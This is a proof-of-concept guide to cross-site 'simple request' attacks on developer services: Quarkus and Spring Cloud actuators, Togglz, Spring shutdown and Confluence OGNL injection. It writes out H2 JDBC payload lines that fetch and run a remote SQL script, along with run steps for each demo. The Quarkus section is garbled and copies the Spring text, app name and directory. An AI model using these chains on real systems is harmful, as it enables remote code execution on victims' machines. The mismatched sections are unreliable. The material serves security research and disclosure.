Simple Request Vulnerabilities in the Developer Environment

Following the below guide and clicking on the payload link will trigger a RCE on your local machine. In all but one instance this will open the Calculator app. ( assuming you are using a Mac. ) Or for Confluence create a file in /tmp.


The repo https://github.com/JoeBeeton/simple-request-attacks contains sample codebases for the below vulnerabilities as well as a docker file to run the payloads locally.

Quarkus RCE CVE-2022-4116


This vulnerability allows utilises the Dev UI which is available when the application is in Developer Mode. The Dev UI has the ability to modify application properties. Up until 2.14.2 it was possible to generate a simple request that modifies those properties and leverage that to execute arbitrary code in the target's JVM.
This is done by first setting the quarkus app's jdbc url to :
quarkus.datasource.jdbc.url=jdbc:h2:mem:testdb;INIT=runscript from 'https://github.bla:8081/exec.sql'
Then restarting the application so the change takes effect via the /restart actuator.
On startup, the Spring App will create a in memory H2 database and call out to http://somerandomsite.bla:8081/exec.sql to download the sql and execute it. This leverages a feature of the in memory H2 database to compile and execute a Java method which in turn opens the Calculator app.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-cloud-v1-vuln
mvn spring-boot:run
 Payload Link


Spring Cloud

This works because Spring Cloud V1 allowed the /env actuator to modify properties with a POST request with content type application/x-www-form-urlencoded. Allowing for a Simple Request attack.
This is done by first setting the spring app's jdbc url to :
spring.datasource.url=jdbc:h2:mem:testdb;INIT=runscript from 'http://somerandomsite.bla:8081/exec.sql'
Then restarting the application so the change takes effect via the /restart actuator.
On startup, the Spring App will create a in memory H2 database and call out to http://somerandomsite.bla:8081/exec.sql to download the sql and execute it. This leverages a feature of the in memory H2 database to compile and execute a Java method which in turn opens the Calculator app.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-cloud-v1-vuln
mvn spring-boot:run
 Payload Link


Togglz

This relies on the Togglz CSRF Vulnerability CVE-2020-28191.
A Simple Post Request can be made to hit localhost which modifies the feature toggle to execute arbitrary Java code via the Nashorn engine during toggle evaluation.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-boot-hello-world-feature-enum
mvn spring-boot:run
 Payload Link


Spring Actuator Shutdown

In Spring V2 actuators require a content-type of application/json. But when a post request does not have a message body, like with the /shutdown actuator, if no content-type is specified the actuator can still be triggered. So a Simple Post Request can be use to shutdown a Spring Boot app bound to localhost.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-boot-hello-world-feature-enum
mvn spring-boot:run
 Payload Link


Confluence CVE-2022-26134

This Confluence RCE relies on OGNL injection. As it is done via a Simple Get Request, it can be run via a Simple Request accessing localhost or an internal network that the victim has access to.

To Run :
git clone https://github.com/vulhub/vulhub.git
cd vulhub/confluence/CVE-2022-26134
docker-compose up
Payload Link